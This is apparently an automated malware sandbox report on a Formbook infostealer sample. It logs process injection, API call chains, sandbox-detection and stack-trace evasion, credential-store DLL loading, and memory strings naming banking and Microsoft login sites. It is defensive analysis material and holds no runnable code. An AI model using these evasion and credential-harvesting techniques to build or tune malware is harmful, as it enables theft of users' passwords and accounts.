            Source: 00000004.00000002.3282844800.0000000004B70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@10/9
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_00A337B5 GetLastError,FormatMessageW,0_2_00A337B5
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_00A210BF AdjustTokenPrivileges,CloseHandle,0_2_00A210BF
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_00A216C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00A216C3
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_00A351CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00A351CD
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_00A4A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00A4A67C
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_00A3648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_00A3648E
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_009C42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_009C42A2
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeFile created: C:\Users\user\AppData\Local\Temp\aut2D45.tmpJump to behavior
            Source: plZuPtZoTk.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: clip.exe, 00000005.00000003.2098089927.0000000000700000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000005.00000002.3281277788.000000000070B000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000005.00000002.3281277788.000000000072F000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000005.00000002.3281277788.0000000000700000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: plZuPtZoTk.exeVirustotal: Detection: 37%
            Source: plZuPtZoTk.exeReversingLabs: Detection: 65%
            Source: unknownProcess created: C:\Users\user\Desktop\plZuPtZoTk.exe "C:\Users\user\Desktop\plZuPtZoTk.exe"
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\plZuPtZoTk.exe"
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeProcess created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
            Source: C:\Windows\SysWOW64\clip.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\plZuPtZoTk.exe"Jump to behavior
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeProcess created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\clip.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: plZuPtZoTk.exeStatic file information: File size 1272832 > 1048576
            Source: plZuPtZoTk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: plZuPtZoTk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: plZuPtZoTk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: plZuPtZoTk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: plZuPtZoTk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: plZuPtZoTk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: plZuPtZoTk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: GtDTOqzvEb.exe, 00000004.00000002.3281125755.000000000066E000.00000002.00000001.01000000.00000005.sdmp, GtDTOqzvEb.exe, 00000008.00000000.1982113880.000000000066E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: plZuPtZoTk.exe, 00000000.00000003.1463967810.00000000040A0000.00000004.00001000.00020000.00000000.sdmp, plZuPtZoTk.exe, 00000000.00000003.1463798414.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812483353.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1911751520.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1814288047.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1911751520.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000005.00000003.1914243462.0000000004337000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000005.00000002.3283785897.000000000467E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000005.00000002.3283785897.00000000044E0000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000005.00000003.1911769094.000000000418A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: plZuPtZoTk.exe, 00000000.00000003.1463967810.00000000040A0000.00000004.00001000.00020000.00000000.sdmp, plZuPtZoTk.exe, 00000000.00000003.1463798414.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1812483353.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1911751520.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1814288047.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1911751520.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, clip.exe, clip.exe, 00000005.00000003.1914243462.0000000004337000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000005.00000002.3283785897.000000000467E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000005.00000002.3283785897.00000000044E0000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000005.00000003.1911769094.000000000418A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: clip.pdb source: svchost.exe, 00000002.00000003.1879019571.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1911590267.0000000003400000.00000004.00000020.00020000.00000000.sdmp, GtDTOqzvEb.exe, 00000004.00000002.3282046334.0000000001038000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: clip.exe, 00000005.00000002.3281277788.0000000000686000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000005.00000002.3284516753.0000000004B0C000.00000004.10000000.00040000.00000000.sdmp, GtDTOqzvEb.exe, 00000008.00000000.1982686880.00000000025FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2206667295.0000000004EAC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: clip.exe, 00000005.00000002.3281277788.0000000000686000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000005.00000002.3284516753.0000000004B0C000.00000004.10000000.00040000.00000000.sdmp, GtDTOqzvEb.exe, 00000008.00000000.1982686880.00000000025FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2206667295.0000000004EAC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: clip.pdbGCTL source: svchost.exe, 00000002.00000003.1879019571.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1911590267.0000000003400000.00000004.00000020.00020000.00000000.sdmp, GtDTOqzvEb.exe, 00000004.00000002.3282046334.0000000001038000.00000004.00000020.00020000.00000000.sdmp
            Source: plZuPtZoTk.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: plZuPtZoTk.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: plZuPtZoTk.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: plZuPtZoTk.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: plZuPtZoTk.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_009C42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_009C42DE
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_009E0A76 push ecx; ret 0_2_009E0A89
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040205A push esi; retf 2_2_00402076
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041405F push ds; ret 2_2_0041408A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402026 push ecx; retf 2_2_0040202D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401888 pushfd ; ret 2_2_004018D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041409F push ds; ret 2_2_0041408A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004139CC push ebx; retf 2_2_004139CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042327B pushfd ; retf 2_2_00423286
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417AC3 push 00000045h; iretd 2_2_00417ACA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004032D0 push eax; ret 2_2_004032D2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00407307 push esp; ret 2_2_00407310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041EC43 push edi; ret 2_2_0041EC4F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A450 push es; iretd 2_2_0041A463
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041EC35 push edi; ret 2_2_0041EC4F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004084CC pushad ; iretd 2_2_004084CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401CDD push ecx; retf 2_2_00401CDE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A4A7 push es; iretd 2_2_0041A463
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004186E8 push BC462628h; iretd 2_2_00418778
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418699 push ecx; ret 2_2_004186E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418699 push ds; retf 2_2_0041878A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418779 push ds; retf 2_2_0041878A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E7AC push ebx; iretd 2_2_0041E7AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B0225F pushad ; ret 2_2_03B027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B027FA pushad ; ret 2_2_03B027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B309AD push ecx; mov dword ptr [esp], ecx2_2_03B309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B0283D push eax; iretd 2_2_03B02858
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeCode function: 4_2_04E92493 push esp; ret 4_2_04E9249C
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeCode function: 4_2_04EA2C41 push 00000045h; iretd 4_2_04EA2C56
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeCode function: 4_2_04EA2C57 push 00000045h; iretd 4_2_04EA2C56
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeCode function: 4_2_04EAE407 pushfd ; retf 4_2_04EAE412
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeCode function: 4_2_04EA9DC1 push edi; ret 4_2_04EA9DDB
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_009DF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_009DF98E
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_00A51C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00A51C41
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Found API chain indicative of sandbox detection
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-96978
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeAPI/Special instruction interceptor: Address: 16E2DFC
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD324
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD7E4
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD944
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD504
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD544
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD1E4
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0154
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFBCB7ADA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7096E rdtsc 2_2_03B7096E
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeAPI coverage: 3.8 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\clip.exeAPI coverage: 2.8 %
            Source: C:\Windows\SysWOW64\clip.exe TID: 4496Thread sleep count: 37 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\clip.exe TID: 4496Thread sleep time: -74000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe TID: 4628Thread sleep time: -50000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe TID: 4628Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\clip.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_00A2DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00A2DBBE
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_009FC2A2 FindFirstFileExW,0_2_009FC2A2
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_00A368EE FindFirstFileW,FindClose,0_2_00A368EE
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_00A3698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00A3698F
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_00A2D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00A2D076
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_00A2D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00A2D3A9
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_00A39642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00A39642
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_00A3979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00A3979D
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_00A39B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00A39B2B
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_00A35C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00A35C97
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0034C0F0 FindFirstFileW,FindNextFileW,FindClose,5_2_0034C0F0
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_009C42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_009C42DE
            Source: clip.exe, 00000005.00000002.3286208729.000000000760B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n PasswordVMware20,11696494690x
            Source: 5-19-2H.5.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
            Source: 5-19-2H.5.drBinary or memory string: discord.comVMware20,11696494690f
            Source: 5-19-2H.5.drBinary or memory string: AMC password management pageVMware20,11696494690
            Source: 5-19-2H.5.drBinary or memory string: outlook.office.comVMware20,11696494690s
            Source: 5-19-2H.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
            Source: 5-19-2H.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
            Source: 5-19-2H.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
            Source: 5-19-2H.5.drBinary or memory string: interactivebrokers.comVMware20,11696494690
            Source: 5-19-2H.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
            Source: clip.exe, 00000005.00000002.3286208729.000000000760B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l.comVMware20,11696494690h
            Source: 5-19-2H.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
            Source: 5-19-2H.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
            Source: 5-19-2H.5.drBinary or memory string: outlook.office365.comVMware20,11696494690t
            Source: 5-19-2H.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
            Source: clip.exe, 00000005.00000002.3281277788.0000000000686000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlli
            Source: GtDTOqzvEb.exe, 00000008.00000002.3282813275.000000000082F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllj
            Source: clip.exe, 00000005.00000002.3286208729.000000000760B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,116
            Source: 5-19-2H.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
            Source: 5-19-2H.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
            Source: 5-19-2H.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
            Source: firefox.exe, 0000000A.00000002.2208006753.0000023F84EFC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 5-19-2H.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
            Source: 5-19-2H.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
            Source: 5-19-2H.5.drBinary or memory string: tasks.office.comVMware20,11696494690o
            Source: clip.exe, 00000005.00000002.3286208729.000000000760B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494
            Source: 5-19-2H.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
            Source: 5-19-2H.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
            Source: 5-19-2H.5.drBinary or memory string: dev.azure.comVMware20,11696494690j
            Source: clip.exe, 00000005.00000002.3286208729.000000000760B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pageVMware20,11696494690
            Source: 5-19-2H.5.drBinary or memory string: global block list test formVMware20,11696494690
            Source: clip.exe, 00000005.00000002.3286208729.000000000760B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,1m6$
            Source: clip.exe, 00000005.00000002.3286208729.000000000760B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: blocklistVMware20,11696494690
            Source: 5-19-2H.5.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
